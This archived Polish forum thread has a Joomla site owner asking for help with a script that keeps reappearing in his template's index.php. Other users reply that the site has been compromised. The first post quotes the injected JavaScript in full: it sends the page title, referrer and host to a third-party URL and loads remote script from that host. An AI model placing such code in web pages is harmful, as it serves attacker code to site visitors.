PDA

Zobacz pełną wersję : Problem ze złośliwym kodem



damianoo
04-01-2016, 10:58
Witam,
Od jakiegoś czasu mam problem z Joomla, dokładniej z dopisującym się złośliwym skryptem do pliku index.php szablonu. Antywirus wywala mi:

Wirus: Script.Trojan.Agent.IT (Skaner http://forum.php.pl/style_emoticons/default/cool.gif

Wirus wykryty podczas wczytywania zawartości strony sieci Web.

Adres: http://m (http://gminamoszczenica.eu/)oszczenica.info
Status: Odmowa dostępu.


Po skasowaniu kawałka kodu wszystko działa, jednak na drugi dzień kod jest już dopisany. Zmieniałem hasła do ftp itd, jednak nadal to samo. Proszę o pomoc.

P.S
Dopisujący się kawałek kodu wygląda tak:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.barth-sanitaer.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Gall Anonim
04-01-2016, 11:11
@damianoo
1.Masz stronę ewidentnie po włamaniu.
2.Podana przez ciebie informacja wskazuje że kasujesz element efektu wynikającego z problemu a nie sam problem (leczysz objaw a nie chorobę u jej podstaw).
3.Każdy przypadek jest na swój sposób indywidualny a na swój sposób mix'em innych.
4.Tak się składa że w ostatnim czasie brać hackerska musiała zarobić parę groszy i zabrali się za masowe wysyłanie maili poprzez lukę w Joomla którą wykryli - a szczerze mówiąc to i tak mniejsze zło niż to że w przypadku ostatnich wykrytych luk uzyskiwali dostęp do BD i mogli ją "wysadzić w kosmos" - czego akurat nie zrobili bo nie mieli w tym interesu.
5.W związku z tym co napisałem powyżej - na forum jest sporo wypowiedzi w ostatnim miesiącu które ci pomogą.
Pzdr
P.S. To co ty masz to i tak jeszcze malutkie piwo :-)

damianoo
04-01-2016, 11:26
Gall, czy mógłbym dostać jakiś link do postu? Bo szukam i szukam i znaleźć nie mogę.

Gall Anonim
04-01-2016, 11:31
@damianoo - bez przesady - od napisania mojego postu do twojego upłynęło 15 minut - może poszukaj jeszcze odrobinkę - bo jak rozumiem oczekujesz że ja to zrobię za ciebie - tak?
Ja nie mam takiej potrzeby bo to twoja strona jest po włamaniu a nie moja.
Pzdr

zwiastun
04-01-2016, 11:33
Wystarczy zajrzeć do katalogu Joomla 3.x / Bezpieczeństwo. Czas skończyć świętowanie :)